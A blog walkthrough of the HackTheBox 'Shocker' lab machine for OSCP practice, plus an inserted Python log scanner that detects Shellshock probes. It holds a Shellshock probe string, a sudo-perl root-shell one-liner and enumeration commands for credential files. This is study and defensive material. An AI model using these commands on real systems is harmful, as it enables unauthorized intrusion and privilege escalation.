Road to OSCP 5: Shocker HackTheBox

Sharghaas
4 min read, Jan 18, 2021


Follow along on my OSCP journey: this is target 5 from TJNULL's OSCP list.


How to use this walkthrough?

To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius' multi-threaded AutoRecon, which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and gives you a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.56

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while waiting for the _full_tcp_nmap.txt to finish.

PORT     STATE SERVICE REASON         VERSION
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu
Aggressive OS guesses: Linux 3.12 (95%),

We have a web server on port 80 and SSH on port 2222. This probably means that we either have to find credentials/keys for SSH or exploit the web app and get RCE.

Web: 80

We can see that Gobuster came back with some interesting directories:

/cgi-bin/ (Status: 403) [Size: 294]
/cgi-bin/.html (Status: 403) [Size: 299]
/index.html (Status: 200) [Size: 137]

We can also see that Apache version 2.4.18 is a bit old. Let's look for some known vulnerabilities:

Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privileg
Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow
Apache mod_cgi - 'Shellshock' Remote Command Injection

Let’s keep those in mind as we progress.

HINT

The machine name, the vulnerabilities found and the folders found all point in the same direction.

.

.

.

.

This has a Shellshock feeling to it. Google the vulnerability and get some insight into how it works and how it is exploited.

HINT

What would we need in order to exploit Shellshock?

.

.

.

.

We need to find an executable script in the cgi-bin directory. It's time to make our fuzzers work.

Dirbuster

We launch Dirbuster, but we make sure to add the directory to the URL since we are looking for a file inside that directory. We also make sure to add the .sh extension since we are looking for executables.

We can now use the Python exploit, but let's look at the code first. It looks like it is trying to find typical files that can be used for Shellshock. Let's add ours to the list.

Save it and run the exploit! The script already starts a listener for us.

And … we get the shell!
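From the defender's side, this whole step leaves a distinctive trace in the web server logs: a request to a CGI script whose User-Agent or Referer header starts with a Bash function definition. The following Python scanner is an added example, not part of the original write-up; it assumes Apache "combined" log format, and the sample log lines and the script name /cgi-bin/script.sh are constructed for the demonstration.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format (assumed layout):
# host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock is triggered by a Bash function definition arriving in an
# environment variable; with mod_cgi, request headers such as User-Agent
# and Referer become exactly such variables. Match the "() {" prefix.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-log line, or None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_shellshock_probe(entry: Dict[str, str]) -> bool:
    """Flag requests to CGI scripts carrying a function definition in a header."""
    # Only CGI paths can hand the header to Bash; probes against static
    # files are noise for this check (extend the prefix list if CGI lives elsewhere).
    if not entry["path"].startswith("/cgi-bin/"):
        return False
    return any(FUNC_DEF_RE.search(entry[field]) for field in ("agent", "referer"))

def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed entries that look like Shellshock attempts."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_shellshock_probe(entry):
            hits.append(entry)
    return hits

# Constructed sample lines (not real traffic from the box).
SAMPLE_LOG = [
    '10.10.14.3 - - [18/Jan/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.3 - - [18/Jan/2021:10:00:05 +0000] "GET /cgi-bin/ HTTP/1.1" 403 294 "-" "gobuster/3.0.1"',
    '10.10.14.3 - - [18/Jan/2021:10:00:09 +0000] "GET /cgi-bin/script.sh HTTP/1.1" 200 118 "-" "() { :; }; echo vulnerable"',
    '10.10.14.3 - - [18/Jan/2021:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 137 "() { :; }; echo x" "curl/7.68"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['host']} {hit['path']} agent={hit['agent']!r}")
```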

Time for some shell upgrade 😉

  1. python -c 'import pty; pty.spawn("/bin/bash")'
  2. Ctrl+Z
  3. stty raw -echo
  4. fg (nothing will show on the screen, just press Enter a couple of times after the command)

Getting Root

The way I go about getting root is the following: I look for some quick wins first and then run some enumeration scripts to help me find weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a database password or even a user password
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

We are really lucky: it seems that our first command comes back with a winner!

User shelly may run the following commands on Shocker:     
(root) NOPASSWD: /usr/bin/perl

Let's look at how to start a shell with Perl and we should be good. GTFOBins is the easy solution:

Let's get a root shell and grab the flags.

10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh";'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)
10.10.10.56> cd /home/shelly
10.10.10.56> cat user.txt
2e-----------------------------
10.10.10.56> cat /root/root.txt
52------------------------------

What did I learn?

  1. We learned what to look for when facing a server possibly vulnerable to Shellshock.
  2. We learned about GTFOBins and how it can help you quickly exploit executables that can be run with root privileges.

Stream

I hope you guys enjoyed the walkthrough. Don't hesitate to join me and struggle together on those machines on my Twitch stream on Wednesdays and Sundays.

Written by Sharghaas

Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together twitch.tv/sharghaas

Responses (1)